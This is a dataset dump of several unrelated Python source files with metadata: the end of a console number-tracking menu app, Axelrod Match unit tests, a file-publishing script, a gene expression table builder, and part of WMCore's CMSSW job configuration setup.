add()\n print(\"-\"*20)\n for i in range(0,len(ANM)):\n print(\"[\"+str(i+1)+\"]: \"+ANM[i][0])\n print(\"-\"*20)\n Pog = input(\"Select A Pog: \")\n try:\n Pog = int(Pog)\n except:\n add()\n Pog = Pog-1\n clear()\n print(\"-\"*20)\n print(\"Follow This Format: 10,20\")\n print(\"-\"*20)\n entry = input(\"Enter a new entry: \")\n entry = entry.split(\",\")\n if len(entry) <= 0:\n add()\n elif len(entry) > 2:\n add()\n try:\n int(entry[0])\n int(entry[1])\n except:\n add()\n date = getDate()\n date = StringSplitList(date,\"/\")\n entry.append(date)\n ANM[Pog].append(entry)\n save()\n print(\"Finished!\")\n input()\n add()\n elif choice == 1:\n clear()\n print(\"-\"*20)\n print(\"Enter A Name: \")\n print(\"-\"*20)\n inpuut = input(\"[]> \")\n ANM.append([str(inpuut)])\n print(\"Pog Added.\")\n input()\n add()\n elif choice == 3:\n menu(\"start\")\n else:\n add()\n\n\ndef editUser():\n load()\n clear()\n if len(ANM) <= 0:\n print(\"Theres no data!\")\n input()\n menu(\"start\")\n else:\n print(\"-\"*20)\n SelectedUser = 0\n for i in range(0,len(ANM)):\n print(\"[\"+str(i+1)+\"]: \"+ANM[i][0])\n print(\"-\"*20)\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editUser()\n SelectedUser = choice\n print(\"[1]: Delete\")\n print(\"[2]: Rename\")\n selection = ANM[SelectedUser-1][0]\n b0ck = \"Selection: \"\n print(\"-\"*(len(b0ck)+len(str(selection))))\n print(b0ck+str(selection))\n print(\"-\"*(len(b0ck)+len(str(selection))))\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editUser()\n if choice == 1:\n clear()\n print(\"Are you sure you want to delete [\"+str(ANM[SelectedUser-1][0])+\"]?, this will delete all of this user's entries.\") # was ANM[choice-1], which always showed the first user\n choice = input(\"[Y/N]: \")\n choice = choice.lower()\n if choice == \"y\":\n del ANM[SelectedUser-1]\n else:\n editUser()\n elif choice == 2:\n clear()\n print(\"Enter a new name.\")\n newValue = input(\">: \")\n ANM[SelectedUser-1][0] = newValue\n else:\n editUser()\n save()\n print(\"Finished, enter any key to continue.\")\n input()\n editUser()\ndef editEntry():\n load()\n clear()\n if len(ANM) <= 0:\n print(\"Theres no data!\")\n input()\n menu(\"start\")\n else:\n SelectedUser = 0\n SelectedEntry = 0\n for i in range(0,len(ANM)):\n print(\"[\"+str(i+1)+\"]: \"+ANM[i][0])\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editEntry()\n SelectedUser = choice-1\n selection = ANM[choice-1]\n for i in range(1,len(selection)):\n print(\"[\"+str((i))+\"]: \"+str(selection[i]))\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editEntry()\n SelectedEntry = choice\n selection = selection[choice]\n clear()\n b0ck = \"Selection: \"\n print(\"-\"*(len(b0ck)+len(str(selection))))\n print(b0ck+str(selection))\n print(\"-\"*(len(b0ck)+len(str(selection))))\n print(\"[1]: Value #1\")\n print(\"[2]: Value #2\")\n print(\"[3]: Date\")\n print(\"[4]: Delete\")\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editEntry()\n if choice == 1:\n newValue = input(\"Enter A New Value: \")\n try:\n newValue = int(newValue)\n except:\n editEntry()\n ANM[SelectedUser][SelectedEntry][0] = newValue\n input(\"Finished, Press any key to continue.\")\n editEntry()\n elif choice == 2:\n newValue = input(\"Enter A New Value: \")\n try:\n newValue = int(newValue)\n except:\n editEntry()\n ANM[SelectedUser][SelectedEntry][1] = newValue\n input(\"Finished, Press any key to continue.\")\n editEntry()\n elif choice == 3:\n newValueOne = input(\"Enter A Day: \")\n newValueTwo = input(\"Enter A Month: \")\n 
newValueThree = input(\"Enter A Year: \")\n try:\n newValueOne = int(newValueOne)\n newValueTwo = int(newValueTwo)\n newValueThree = int(newValueThree)\n except:\n editEntry()\n # store the new date while still inside the date branch; the original assigned it\n # after the whole if-chain, which crashed after a delete and raised NameError for\n # the other choices\n ANM[SelectedUser][SelectedEntry][2] = StringSplitList([newValueThree,newValueTwo,newValueOne],\"/\")\n elif choice == 4:\n del ANM[SelectedUser][SelectedEntry]\n else:\n editEntry()\n\n save()\n input(\"Finished, Press any key to continue.\")\n editEntry()\ndef edit():\n clear()\n print(\"-\"*20)\n print(\"[1]: Edit User\")\n print(\"[2]: Edit Entry\")\n print(\"[3]: Return\")\n print(\"-\"*20)\n choice = input(\">: \")\n try:\n choice = int(choice)\n except:\n menu(\"start\")\n if choice == 1:\n editUser()\n elif choice == 2:\n editEntry()\n elif choice == 3:\n menu(\"start\")\n else:\n edit()\n\n\n\n\n\ndef plural(x):\n if x == 1 or x == -1:\n return(\"\")\n else:\n return(\"s\")\n\n\ndef stats():\n load()\n if len(ANM) <= 0:\n print(\"Theres no data!\")\n input()\n menu(\"start\")\n clear()\n print(\"/\"*40)\n for i in range(0,len(ANM)):\n pack = []\n pack.append(ANM[i][0])\n pog = ANM[i]\n for y in range(1,len(pog)):\n pack.append(pog[y][0])\n pack.append(pog[y][1])\n\n numbers = []\n top = 0\n topCount = 0\n for y in range(1,len(pack)):\n numbers.append(int(pack[y]))\n for y in range(1,len(pack)):\n if numbers.count(int(pack[y])) > topCount: # compare against the running count, not the stored value\n top = int(pack[y])\n topCount = numbers.count(int(pack[y]))\n print(pog[0])\n print(\" Most Frequent Number: [\"+ str(top) + \"] Occurences: [\" + str(topCount)+\"]\")\n print(\"/\"*40)\n input(\"Press Any Key To Continue.\")\n menu(\"start\")\n \"\"\"\n data = []\n for i in range(0,len(ANM)):\n data.append([str(ANM[i][0])])\n for y in range(1,len(ANM[i])):\n data[i].append(ANM[i][y][0])\n data[i].append(ANM[i][y][1])\n numbers = []\n for z in range(0,len(data)):\n for y in range(1,len(data[z])):\n try:\n numbers.append(int(data[z][y]))\n except:\n pass\n\n mostFrequent = 0\n Occurences = 0\n for y in numbers:\n if numbers.count(y) > mostFrequent:\n mostFrequent = y\n Occurences = numbers.count(y)\n print(ANM[i][0])\n print(\" This Pog's Most Frequent Number Is: \" + str(mostFrequent) + \" , With \" + str(Occurences)+\" Occurence\" + plural(Occurences) + \"!\")\n input()\n \"\"\"\n\n\n\ndef menu(x):\n load()\n global ANM\n clear()\n def start():\n print(\"-\"*20)\n print(\"[1]: View\")\n print(\"[2]: Add\")\n print(\"[3]: Edit/Remove\")\n print(\"[4]: Stats\")\n print(\"-\"*20)\n choice = input(\"[]:> \")\n try:\n choice = int(choice)\n except:\n menu(\"start\")\n if choice == 1:\n view()\n elif choice == 2:\n add()\n elif choice == 3:\n edit()\n elif choice == 4:\n stats()\n else:\n menu(\"start\")\n exec(str.lower(x)+\"()\")\nmenu(\"start\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"508360958","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport axelrod\nfrom axelrod import Actions\n\nfrom hypothesis import given, example\nfrom hypothesis.strategies import integers, floats, random_module, assume\n\nC, D = Actions.C, Actions.D\n\n\nclass TestMatch(unittest.TestCase):\n\n @given(turns=integers(min_value=1, max_value=200),\n prob_end=floats(min_value=0, max_value=1))\n @example(turns=5, prob_end=None)\n def test_init(self, turns, prob_end):\n p1, p2 = axelrod.Cooperator(), axelrod.Cooperator()\n match = axelrod.Match((p1, p2), turns, prob_end=prob_end)\n self.assertEqual(match.result, [])\n self.assertEqual(match.player1, 
p1)\n self.assertEqual(match.player2, p2)\n self.assertEqual(\n match._classes, (axelrod.Cooperator, axelrod.Cooperator))\n self.assertEqual(match._turns, turns)\n self.assertEqual(match._prob_end, prob_end)\n self.assertEqual(match._cache, {})\n self.assertEqual(match._cache_mutable, True)\n self.assertEqual(match._noise, 0)\n\n # Checking that prob_end has default None\n match = axelrod.Match((p1, p2), turns)\n self.assertEqual(match.result, [])\n self.assertEqual(match.player1, p1)\n self.assertEqual(match.player2, p2)\n self.assertEqual(\n match._classes, (axelrod.Cooperator, axelrod.Cooperator))\n self.assertEqual(match._turns, turns)\n self.assertEqual(match._prob_end, None)\n self.assertEqual(match._cache, {})\n self.assertEqual(match._cache_mutable, True)\n self.assertEqual(match._noise, 0)\n\n @given(p=floats(min_value=0, max_value=1),\n rm=random_module())\n def test_stochastic(self, p, rm):\n\n assume(0 < p < 1)\n\n p1, p2 = axelrod.Cooperator(), axelrod.Cooperator()\n match = axelrod.Match((p1, p2), 5)\n self.assertFalse(match._stochastic)\n\n match = axelrod.Match((p1, p2), 5, noise=p)\n self.assertTrue(match._stochastic)\n\n match = axelrod.Match((p1, p2), 5, prob_end=p)\n self.assertTrue(match._stochastic)\n\n p1 = axelrod.Random()\n match = axelrod.Match((p1, p2), 5)\n self.assertTrue(match._stochastic)\n\n @given(p=floats(min_value=0, max_value=1),\n rm=random_module())\n def test_cache_update_required(self, p, rm):\n\n assume(0 < p < 1)\n\n p1, p2 = axelrod.Cooperator(), axelrod.Cooperator()\n match = axelrod.Match((p1, p2), 5, noise=p)\n self.assertFalse(match._cache_update_required)\n\n match = axelrod.Match((p1, p2), 5, prob_end=p)\n self.assertFalse(match._cache_update_required)\n\n match = axelrod.Match((p1, p2), 5, cache_mutable=False)\n self.assertFalse(match._cache_update_required)\n\n match = axelrod.Match((p1, p2), 5)\n self.assertTrue(match._cache_update_required)\n\n p1 = axelrod.Random()\n match = axelrod.Match((p1, p2), 5)\n self.assertFalse(match._cache_update_required)\n\n def test_play(self):\n cache = {}\n players = (axelrod.Cooperator(), axelrod.Defector())\n match = axelrod.Match(players, 3, cache)\n expected_result = [(C, D), (C, D), (C, D)]\n self.assertEqual(match.play(), expected_result)\n self.assertEqual(\n cache[(axelrod.Cooperator, axelrod.Defector)], expected_result)\n\n # a deliberately incorrect result so we can tell it came from the cache\n expected_result = [(C, C), (D, D), (D, C)]\n cache = {(axelrod.Cooperator, axelrod.Defector): expected_result}\n match = axelrod.Match(players, 3, cache)\n self.assertEqual(match.play(), expected_result)\n\n @given(turns=integers(min_value=1, max_value=200),\n prob_end=floats(min_value=0, max_value=1),\n rm=random_module())\n def test_prob_end_play(self, turns, prob_end, rm):\n\n players = (axelrod.Cooperator(), axelrod.Defector())\n match = axelrod.Match(players, turns, prob_end=prob_end)\n self.assertTrue(0 <= len(match.play()))\n\n # If game has no ending the length will be turns\n match = axelrod.Match(players, turns, prob_end=0)\n self.assertEqual(len(match.play()), turns)\n\n # If game has 1 prob of ending it lasts only one turn\n match = axelrod.Match(players, turns, prob_end=1)\n self.assertEqual(len(match.play()), 1)\n\n @given(prob_end=floats(min_value=0.25, max_value=0.75),\n rm=random_module())\n def test_prob_end_play_with_no_turns(self, prob_end, rm):\n players = (axelrod.Cooperator(), axelrod.Defector())\n match = axelrod.Match(players, float(\"inf\"), prob_end=prob_end)\n 
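# (added note) prob_end acts as a per-turn stopping probability, so even with turns=inf\n # the match terminates almost surely; the expected length is roughly 1/prob_end\n 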
self.assertTrue(0 <= len(match.play()))\n\n def test_sparklines(self):\n players = (axelrod.Cooperator(), axelrod.Alternator())\n match = axelrod.Match(players, 4)\n match.play()\n expected_sparklines = u'████\\n█ █ '\n self.assertEqual(match.sparklines(), expected_sparklines)\n expected_sparklines = u'XXXX\\nXYXY'\n self.assertEqual(match.sparklines('X', 'Y'), expected_sparklines)\n","sub_path":"axelrod/tests/unit/test_match.py","file_name":"test_match.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162732842","text":"import os\nimport shutil\n\nfileDir = os.path.dirname(os.path.abspath(__file__))\nbackendDir = os.path.dirname(fileDir)\npublishDir = os.path.join(os.path.dirname(backendDir), \"publish\")\n\n\ndef copyBackendToPublish(src, dst):\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s) and item != \"scripts\":\n shutil.copytree(s, d)\n elif os.path.isfile(s):\n shutil.copyfile(s, d)\n\n\ndef cleanPublish():\n for item in os.listdir(publishDir):\n s = os.path.join(publishDir, item)\n if os.path.isdir(s) and item != \"build\":\n shutil.rmtree(s)\n elif os.path.isfile(s):\n os.remove(s)\n\n\ncleanPublish()\ncopyBackendToPublish(backendDir, publishDir)\n","sub_path":"MY_REPOS/Lambda-Resource-Static-Assets/13-web-tools/REUSABLE_WEB_COMPONENTS/FlaskDefault/backend/scripts/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"288964922","text":"# Script to create a file with the following tab-separated fields for each Ensembl gene:\n# chromosome\n# start\n# end\n# name/ID\n# B cell TPM values (csv);T cell TPM values (csv)\n# strand\n\n# For input need:\n# Reference GTF\n# TSV of B cell TPM values (first field is gene name, second is ensembl ID, rest are TPM values)\n# TSV of T cell TPM values (first field is gene name, second is ensembl ID, rest are TPM values)\n# Output file name\n\nimport sys\nimport re\n\ndef tidyAttr(attrVal):\n\t# Remove unwanted characters (quotes, semicolons) from attribute value strings\n\treturn re.sub(\"[\\\";]\", \"\", attrVal)\n\ndef processGtf(gtfFile):\n\t# Go through a GTF file line-by-line and pull out gene information\n\t# Save in a dict with ensembl IDs as keys and dicts as values\n\tprint(\"Processing GTF file ... \"),\n\tsys.stdout.flush()\n\toutDict = {}\n\t\n\twith open(gtfFile, 'r') as f:\n\t\tfor line in f:\n\t\t\tif line[0] == \"#\":\n\t\t\t\tcontinue\n\t\t\n\t\t\tlineList = re.split(\"\\s+\", line.strip())\n\t\t\tif lineList[2] != \"gene\":\n\t\t\t\tcontinue\n\t\t\t\n\t\t\toutDict[tidyAttr(lineList[9])] = {\n\t\t\t\t\t\t\t\t\t\t\t\t\"chromosome\":\"chr\"+lineList[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\"start\":lineList[3],\n\t\t\t\t\t\t\t\t\t\t\t\t\"end\":lineList[4],\n\t\t\t\t\t\t\t\t\t\t\t\t\"strand\":lineList[6],\n\t\t\t\t\t\t\t\t\t\t\t\t\"b_expr\":[],\n\t\t\t\t\t\t\t\t\t\t\t\t\"t_expr\":[]\n\t\t\t\t\t\t\t\t\t\t\t}\n\tprint(\"Done\")\n\treturn outDict\n\t\ndef addExprVals(geneDict, bExprTsv, tExprTsv):\n\t# Go through the TSV files of expression levels and add to the gene dictionary\n\tprint(\"Adding expression values to gene dictionary ... 
\"),\n\tsys.stdout.flush()\n\tfor tsv,k in zip([bExprTsv, tExprTsv], [\"b_expr\", \"t_expr\"]):\n\t\twith open(tsv, 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tlineList = line.strip().split(\"\\t\")\n\t\t\t\tgeneDict[lineList[1]][k] = lineList[2:]\n\tprint(\"Done\")\n\treturn geneDict\n\t\ndef writeToFile(geneDict, outFile):\n\tprint(\"Writing results to file ... \"),\n\tsys.stdout.flush()\n\twith open(outFile, 'wa') as f:\n\t\tfor k in geneDict.keys():\n\t\t\td = geneDict[k]\n\t\t\toutStr = \"\\t\".join([\n\t\t\t\t\t\t\t\td[\"chromosome\"],\n\t\t\t\t\t\t\t\td[\"start\"],\n\t\t\t\t\t\t\t\td[\"end\"],\n\t\t\t\t\t\t\t\tk,\n\t\t\t\t\t\t\t\t\",\".join(d[\"b_expr\"])+\";\"+\",\".join(d[\"t_expr\"]),\n\t\t\t\t\t\t\t\td[\"strand\"]\n\t\t\t\t\t\t\t ]) + \"\\n\"\n\t\t\tf.write(outStr)\n\t\t\t\n\tprint(\"Done\")\n\t\t\t\ngtfFile = sys.argv[1]\nbExprTsv = sys.argv[2]\ntExprTsv = sys.argv[3]\noutFile = sys.argv[4]\n\ngeneDict = addExprVals(processGtf(gtfFile), bExprTsv, tExprTsv)\n\nwriteToFile(geneDict, outFile)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\n\t\t\n\t\n","sub_path":"scripts/make_gene_expr_by_cell_file.py","file_name":"make_gene_expr_by_cell_file.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275318337","text":"\"\"\"\n_SetupCMSSWPset_\n\nCreate a CMSSW PSet suitable for running a WMAgent job.\n\n\"\"\"\nfrom __future__ import print_function\n\nimport json\nimport logging\nimport os\nimport pickle\nimport random\nimport socket\nimport re\n\nimport FWCore.ParameterSet.Config as cms\n\nfrom PSetTweaks.PSetTweak import PSetTweak\nfrom PSetTweaks.WMTweak import applyTweak, makeJobTweak, makeOutputTweak, makeTaskTweak, resizeResources\nfrom WMCore.Storage.SiteLocalConfig import loadSiteLocalConfig\nfrom WMCore.Storage.TrivialFileCatalog import TrivialFileCatalog\nfrom WMCore.WMRuntime.ScriptInterface import ScriptInterface\nfrom WMCore.WMRuntime.Tools.Scram import isCMSSWSupported, isEnforceGUIDInFileNameSupported\n\n\ndef fixupGlobalTag(process):\n \"\"\"\n _fixupGlobalTag_\n\n Make sure that the process has a GlobalTag.globaltag string.\n\n Requires that the configuration already has a properly configured GlobalTag object.\n\n \"\"\"\n if hasattr(process, \"GlobalTag\"):\n if not hasattr(process.GlobalTag, \"globaltag\"):\n process.GlobalTag.globaltag = cms.string(\"\")\n return\n\n\ndef fixupGlobalTagTransaction(process):\n \"\"\"\n _fixupGlobalTagTransaction_\n\n Make sure that the process has a GlobalTag.DBParameters.transactionId string.\n\n Requires that the configuration already has a properly configured GlobalTag object\n\n (used to customize conditions access for Tier0 express processing)\n\n \"\"\"\n if hasattr(process, \"GlobalTag\"):\n if not hasattr(process.GlobalTag.DBParameters, \"transactionId\"):\n process.GlobalTag.DBParameters.transactionId = cms.untracked.string(\"\")\n return\n\n\ndef fixupFirstRun(process):\n \"\"\"\n _fixupFirstRun_\n\n Make sure that the process has a firstRun parameter.\n\n \"\"\"\n if not hasattr(process.source, \"firstRun\"):\n process.source.firstRun = cms.untracked.uint32(0)\n return\n\n\ndef fixupLastRun(process):\n \"\"\"\n _fixupLastRun_\n\n Make sure that the process has a lastRun parameter.\n\n \"\"\"\n if not hasattr(process.source, \"lastRun\"):\n process.source.lastRun = cms.untracked.uint32(0)\n return\n\n\ndef fixupLumisToProcess(process):\n \"\"\"\n _fixupLumisToProcess_\n\n Make sure that the process has a 
lumisToProcess parameter.\n\n \"\"\"\n if not hasattr(process.source, \"lumisToProcess\"):\n process.source.lumisToProcess = cms.untracked.VLuminosityBlockRange()\n return\n\n\ndef fixupSkipEvents(process):\n \"\"\"\n _fixupSkipEvents_\n\n Make sure that the process has a skip events parameter.\n\n \"\"\"\n if not hasattr(process.source, \"skipEvents\"):\n process.source.skipEvents = cms.untracked.uint32(0)\n return\n\n\ndef fixupFirstEvent(process):\n \"\"\"\n _fixupFirstEvent_\n\n Make sure that the process has a first event parameter.\n\n \"\"\"\n if not hasattr(process.source, \"firstEvent\"):\n process.source.firstEvent = cms.untracked.uint32(0)\n return\n\n\ndef fixupMaxEvents(process):\n \"\"\"\n _fixupMaxEvents_\n\n Make sure that the process has a max events parameter.\n\n \"\"\"\n if not hasattr(process, \"maxEvents\"):\n process.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))\n if not hasattr(process.maxEvents, \"input\"):\n process.maxEvents.input = cms.untracked.int32(-1)\n return\n\n\ndef fixupFileNames(process):\n \"\"\"\n _fixupFileNames_\n\n Make sure that the process has a fileNames parameter.\n\n \"\"\"\n if not hasattr(process.source, \"fileNames\"):\n process.source.fileNames = cms.untracked.vstring()\n return\n\n\ndef fixupSecondaryFileNames(process):\n \"\"\"\n _fixupSecondaryFileNames_\n\n Make sure that the process has a secondaryFileNames parameter.\n\n \"\"\"\n if not hasattr(process.source, \"secondaryFileNames\"):\n process.source.secondaryFileNames = cms.untracked.vstring()\n return\n\n\ndef fixupFirstLumi(process):\n \"\"\"\n _fixupFirstLumi\n\n Make sure that the process has firstLuminosityBlock parameter.\n \"\"\"\n if not hasattr(process.source, \"firstLuminosityBlock\"):\n process.source.firstLuminosityBlock = cms.untracked.uint32(1)\n return\n\n\nclass SetupCMSSWPset(ScriptInterface):\n \"\"\"\n _SetupCMSSWPset_\n\n \"\"\"\n fixupDict = {\"process.GlobalTag.globaltag\": fixupGlobalTag,\n \"process.GlobalTag.DBParameters.transactionId\": fixupGlobalTagTransaction,\n \"process.source.fileNames\": fixupFileNames,\n \"process.source.secondaryFileNames\": fixupSecondaryFileNames,\n \"process.maxEvents.input\": fixupMaxEvents,\n \"process.source.skipEvents\": fixupSkipEvents,\n \"process.source.firstEvent\": fixupFirstEvent,\n \"process.source.firstRun\": fixupFirstRun,\n \"process.source.lastRun\": fixupLastRun,\n \"process.source.lumisToProcess\": fixupLumisToProcess,\n \"process.source.firstLuminosityBlock\": fixupFirstLumi}\n\n def __init__(self, crabPSet=False):\n ScriptInterface.__init__(self)\n self.crabPSet = crabPSet\n self.process = None\n self.jobBag = None\n self.logger = logging.getLogger()\n\n def createProcess(self, scenario, funcName, funcArgs):\n \"\"\"\n _createProcess_\n\n Create a Configuration.DataProcessing PSet.\n\n \"\"\"\n if funcName == \"merge\":\n\n if getattr(self.jobBag, \"useErrorDataset\", False):\n funcArgs['outputmod_label'] = \"MergedError\"\n\n try:\n from Configuration.DataProcessing.Merge import mergeProcess\n self.process = mergeProcess(**funcArgs)\n except Exception as ex:\n msg = \"Failed to create a merge process.\"\n self.logger.exception(msg)\n raise ex\n elif funcName == \"repack\":\n try:\n from Configuration.DataProcessing.Repack import repackProcess\n self.process = repackProcess(**funcArgs)\n except Exception as ex:\n msg = \"Failed to create a repack process.\"\n self.logger.exception(msg)\n raise ex\n else:\n try:\n from Configuration.DataProcessing.GetScenario import getScenario\n scenarioInst = 
getScenario(scenario)\n except Exception as ex:\n msg = \"Failed to retrieve the Scenario named \"\n msg += str(scenario)\n msg += \"\\nWith Error:\"\n msg += str(ex)\n self.logger.error(msg)\n raise ex\n try:\n self.process = getattr(scenarioInst, funcName)(**funcArgs)\n except Exception as ex:\n msg = \"Failed to load process from Scenario %s (%s).\" % (scenario, scenarioInst)\n self.logger.error(msg)\n raise ex\n\n return\n\n def loadPSet(self):\n \"\"\"\n _loadPSet_\n\n Load a PSet that was shipped with the job sandbox.\n\n \"\"\"\n psetModule = \"WMTaskSpace.%s.PSet\" % self.step.data._internal_name\n\n try:\n processMod = __import__(psetModule, globals(), locals(), [\"process\"], -1)\n self.process = processMod.process\n except ImportError as ex:\n msg = \"Unable to import process from %s:\\n\" % psetModule\n msg += str(ex)\n self.logger.error(msg)\n raise ex\n\n return\n\n def fixupProcess(self):\n \"\"\"\n _fixupProcess_\n\n Look over the process object and make sure that all of the attributes\n that we expect to exist actually exist.\n\n \"\"\"\n # Make sure that for each output module the following parameters exist\n # in the PSet returned from the framework:\n # fileName\n # logicalFileName\n # dataset.dataTier\n # dataset.filterName\n if hasattr(self.process, \"outputModules\"):\n outputModuleNames = self.process.outputModules.keys()\n else:\n outputModuleNames = self.process.outputModules_()\n for outMod in outputModuleNames:\n outModRef = getattr(self.process, outMod)\n if not hasattr(outModRef, \"dataset\"):\n outModRef.dataset = cms.untracked.PSet()\n if not hasattr(outModRef.dataset, \"dataTier\"):\n outModRef.dataset.dataTier = cms.untracked.string(\"\")\n if not hasattr(outModRef.dataset, \"filterName\"):\n outModRef.dataset.filterName = cms.untracked.string(\"\")\n if not hasattr(outModRef, \"fileName\"):\n outModRef.fileName = cms.untracked.string(\"\")\n if not hasattr(outModRef, \"logicalFileName\"):\n outModRef.logicalFileName = cms.untracked.string(\"\")\n return\n\n def applyTweak(self, psetTweak):\n \"\"\"\n _applyTweak_\n\n Apply a tweak to the process.\n \"\"\"\n tweak = PSetTweak()\n tweak.unpersist(psetTweak)\n applyTweak(self.process, tweak, self.fixupDict)\n return\n\n def handleSeeding(self):\n \"\"\"\n _handleSeeding_\n\n Handle Random Seed settings for the job\n \"\"\"\n seeding = getattr(self.jobBag, \"seeding\", None)\n self.logger.info(\"Job seeding set to: %s\", seeding)\n if seeding == \"ReproducibleSeeding\":\n randService = self.process.RandomNumberGeneratorService\n tweak = PSetTweak()\n for x in randService:\n parameter = \"process.RandomNumberGeneratorService.%s.initialSeed\" % x._internal_name\n tweak.addParameter(parameter, x.initialSeed)\n applyTweak(self.process, tweak, self.fixupDict)\n else:\n if hasattr(self.process, \"RandomNumberGeneratorService\"):\n from IOMC.RandomEngine.RandomServiceHelper import RandomNumberServiceHelper\n helper = RandomNumberServiceHelper(self.process.RandomNumberGeneratorService)\n helper.populate()\n return\n\n def handlePerformanceSettings(self):\n \"\"\"\n _handlePerformanceSettings_\n\n Install the standard performance report services\n \"\"\"\n # include the default performance report services\n if getattr(self.step.data.application.command, 'silentMemoryCheck', False):\n self.process.add_(cms.Service(\"SimpleMemoryCheck\", jobReportOutputOnly=cms.untracked.bool(True)))\n else:\n self.process.add_(cms.Service(\"SimpleMemoryCheck\"))\n\n self.process.add_(cms.Service(\"CPU\"))\n 
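# (added note) the CPU and Timing services publish performance figures into the\n # framework job report; summaryOnly below keeps per-event timing out of the log\n 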
self.process.add_(cms.Service(\"Timing\"))\n self.process.Timing.summaryOnly = cms.untracked(cms.bool(True))\n\n return\n\n def handleChainedProcessing(self):\n \"\"\"\n _handleChainedProcessing_\n\n In order to handle chained processing it's necessary to feed\n output of one step/task (nomenclature ambiguous) to another.\n This method creates particular mapping in a working Trivial\n File Catalog (TFC).\n \"\"\"\n self.logger.info(\"Handling chained processing job\")\n # first, create an instance of TrivialFileCatalog to override\n tfc = TrivialFileCatalog()\n # check the jobs input files\n inputFile = (\"../%s/%s.root\" % (self.step.data.input.inputStepName,\n self.step.data.input.inputOutputModule))\n tfc.addMapping(\"direct\", inputFile, inputFile, mapping_type=\"lfn-to-pfn\")\n tfc.addMapping(\"direct\", inputFile, inputFile, mapping_type=\"pfn-to-lfn\")\n\n fixupFileNames(self.process)\n fixupMaxEvents(self.process)\n self.process.source.fileNames.setValue([inputFile])\n self.process.maxEvents.input.setValue(-1)\n\n tfcName = \"override_catalog.xml\"\n tfcPath = os.path.join(os.getcwd(), tfcName)\n self.logger.info(\"Creating override TFC and saving into '%s'\", tfcPath)\n tfcStr = tfc.getXML()\n with open(tfcPath, 'w') as tfcFile:\n tfcFile.write(tfcStr)\n\n self.step.data.application.overrideCatalog = \"trivialcatalog_file:\" + tfcPath + \"?protocol=direct\"\n\n return\n\n def handlePileup(self):\n \"\"\"\n _handlePileup_\n\n Handle pileup settings.\n \"\"\"\n # find out local site SE name\n siteConfig = loadSiteLocalConfig()\n PhEDExNodeName = siteConfig.localStageOut[\"phedex-node\"]\n self.logger.info(\"Running on site '%s', local PNN: '%s'\", siteConfig.siteName, PhEDExNodeName)\n\n pileupDict = self._getPileupConfigFromJson()\n\n # 2011-02-03 according to the most recent version of instructions, we do\n # want to differentiate between \"MixingModule\" and \"DataMixingModule\"\n mixModules, dataMixModules = self._getPileupMixingModules()\n\n # 2011-02-03\n # on the contrary to the initial instructions (wave), there are\n # going to be only two types of pileup input datasets: \"data\" or \"mc\"\n # unlike all previous places where pileupType handled in a flexible\n # way as specified in the configuration passed by the user, here are\n # the two pileupTypes hardcoded: and we are going to add the \"mc\"\n # datasets to \"MixingModule\"s and only add the \"data\" datasets to the\n # \"DataMixingModule\"s\n\n # if the user in the configuration specifies different pileup types\n # than \"data\" or \"mc\", the following call will not modify anything\n self._processPileupMixingModules(pileupDict, PhEDExNodeName, dataMixModules, \"data\")\n self._processPileupMixingModules(pileupDict, PhEDExNodeName, mixModules, \"mc\")\n\n return\n\n def _processPileupMixingModules(self, pileupDict, PhEDExNodeName,\n modules, requestedPileupType):\n \"\"\"\n Iterates over all modules and over all pileup configuration types.\n The only considered types are \"data\" and \"mc\" (input to this method).\n If other pileup types are specified by the user, the method doesn't\n modify anything.\n\n The method considers only files which are present on this local PNN.\n The job will use only those, unless it was told to trust the PU site\n location (trustPUSitelists=True), in this case ALL the blocks/files\n will be added to the PSet and files will be read via AAA.\n Dataset, divided into blocks, may not have all blocks present on a\n particular PNN. 
However, all files belonging to a block will be\n        present when reported by DBS.\n\n        The structure of the pileupDict: PileupFetcher._queryDbsAndGetPileupConfig\n\n        2011-02-03:\n        According to the current implementation of the helper testing module\n        WMCore_t/WMRuntime_t/Scripts_t/WMTaskSpace/cmsRun1/PSet.py,\n        each type of module instance can have either a \"secsource\"\n        or an \"input\" attribute, so we need to probe both; one shall succeed.\n        \"\"\"\n        self.logger.info(\"Requested pileup type %s with %d mixing modules\", requestedPileupType, len(modules))\n\n        for m in modules:\n            self.logger.info(\"Loaded module type: %s\", m.type_())\n            for pileupType in self.step.data.pileup.listSections_():\n                # there should be either \"input\" or \"secsource\" attributes\n                # and both \"MixingModule\", \"DataMixingModule\" can have both\n                inputTypeAttrib = getattr(m, \"input\", None) or getattr(m, \"secsource\", None)\n                self.logger.info(\"pileupType: %s with input attributes: %s\", pileupType, bool(inputTypeAttrib))\n                if not inputTypeAttrib:\n                    continue\n                inputTypeAttrib.fileNames = cms.untracked.vstring()\n                if pileupType == requestedPileupType:\n                    eventsAvailable = 0\n                    useAAA = True if getattr(self.jobBag, 'trustPUSitelists', False) else False\n                    self.logger.info(\"Pileup set to read data remotely: %s\", useAAA)\n                    for blockName in sorted(pileupDict[pileupType].keys()):\n                        blockDict = pileupDict[pileupType][blockName]\n                        if PhEDExNodeName in blockDict[\"PhEDExNodeNames\"] or useAAA:\n                            eventsAvailable += int(blockDict.get('NumberOfEvents', 0))\n                            for fileLFN in blockDict[\"FileList\"]:\n                                # vstring does not support unicode\n                                